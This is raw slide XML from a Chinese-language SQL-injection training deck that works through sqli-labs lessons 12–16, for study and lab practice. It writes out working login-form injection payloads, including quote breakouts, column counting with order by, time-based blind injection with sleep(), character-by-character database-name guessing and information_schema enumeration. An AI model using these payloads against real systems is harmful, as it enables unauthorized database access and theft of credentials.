            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>可以得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>数据库中的所有的表信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207836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54CA13F-1D0E-48C4-9C87-45F5A8AE9184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1956298" y="125743"/>
            <a:ext cx="10131425" cy="6501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a:ln w="3175" cmpd="sng">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>参考必读</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D209308-3058-435A-B1FF-A15CD505AC2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1080655"/>
            <a:ext cx="11935323" cy="543098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本次分享的</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中很多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>参考</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教程均参考至互联网，而且只是作为教学使用，请勿商用和其他非法用途，若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中存在错误等信息，请和我联系：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"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crow_821@163.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US"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 或者是在微信公众号：</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乌鸦安全</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给我留言，我会第一时间进行修改！公众号看的比较少，可以联系</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3139354876</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如果你在学习中有任何的问题和困难，也可以和我联系，我告诉你我遇到困难的时候是如何退缩的！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哈哈，玩笑话，有问题可以发我邮箱或者是留言，我看到之后都会答复的！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免费分享不易，难免有错，请多多指教！</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en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Sqli</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-labs</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中的最好不好直接复制，很多的单引号都变成了中文的单引号了，大家可以自己手打一下，练习练习。</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en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Ppt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中可能你看着密密麻麻的，但是不要担心，只要认真学，从第一关学到最后一关之后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>注入的常识就懂了！记住，是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>常识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>！！！</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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>我在这里特别感谢分享在网上的各种教程，感谢各位大佬的帮助，我在这里就不再一一列举。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:sysClr val="window" lastClr="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:sysClr val="window" lastClr="FFFFFF"/>
              </a:buClr>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视频和</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中非特殊说明外，均以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security</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库、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>表、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>字段作为演示！如果视频或者是课件更新的话，我还是会在公众号中进行说明的！亦或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>GitHub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/crow821/crowsec</a:t>
            </a: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3092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59315" y="236054"/>
            <a:ext cx="10131425" cy="525420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Less-12_02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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>0x7e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>代表的就是  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>~</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1501532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93965"/>
            <a:ext cx="10131425" cy="525420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Less-13_01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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=admin &amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>admin&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=Submit  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时只是显示登陆成功，但是不会显示其他的信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=‘ &amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>a&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=Submit  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>直接通过报错信息知道了如何构造   构造：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1’) or 1=1#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=admin‘) order by 2# &amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>admin&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=Submit  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时只是显示登陆成功，但是不会显示其他信息，考虑盲注。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=admin‘) or if(length(database())=8,1,sleep(5))# &amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>admin&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时可以得到数据库的长度是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>8.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5.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left(database(),1)&gt;’a‘#&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>left()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>来判断第一个字母是多少</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>注意的是这里不是使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>and)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>6.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left(database(),2)=’se‘#&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>通过这样一个个进行判断即可！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>7.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schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> limit 0,1),1)&gt;’a‘#&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>或者是使用这种方法也是可以判断的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>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2237867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03897" y="249383"/>
            <a:ext cx="10131425" cy="525420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Less-13_02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0,1),1)=’e‘#&amp;submit=Submit  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查表，也可使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>进行辅助测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>本次并不使用脚本进行测试，后续会进行专门的脚本讲解</a:t>
            </a:r>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593060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33388" y="180110"/>
            <a:ext cx="10131425" cy="525420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Less-14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 or 1=1#</a:t>
            </a:r>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 order by 10#&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>判断一共有多少列</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admin&amp;passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=a“ or if(length(database())=8,1,sleep(5))# #&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>使用和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>less-13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>同样的方法进行判断</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"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6917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05678" y="160623"/>
            <a:ext cx="10131425" cy="525420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Less-15</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02327"/>
            <a:ext cx="11762509" cy="5218019"/>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1‘ or 1=1#   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在这里判断列数没有实际意义了</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if(length(database())&gt;1000,1,sleep(5))#&amp;submit=Submit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2387818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Less-16</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0" y="1177636"/>
            <a:ext cx="12192000" cy="5257031"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>admin&amp;passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=a“ &amp; submit=Submit    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>构造：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1”)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> or 1=1#   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在这里判断列数没有实际意义了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>less-15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>相同</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>adminadmin&amp;passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>admiand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>") or if(length(database())&gt;1,1,sleep(5))#&amp;submit=Submit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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>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1446014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71437-EBCE-4757-A971-66F879F73045}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2060575" y="361271"/>
            <a:ext cx="10131425" cy="238067"/>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04F7F5AC-F388-4D77-BDBC-0AEF38BA94A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787401" y="900289"/>
            <a:ext cx="11065932" cy="5699066"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>参考资料：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.jb51.net/article/125599.htm</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https://www.jb51.net/article/125607.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>UPDATEXML (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>XML_document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>XPath_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>new_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>第一个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>XML_document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>格式，为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>文档对象的名称，文中为</a:t>
            </a:r>
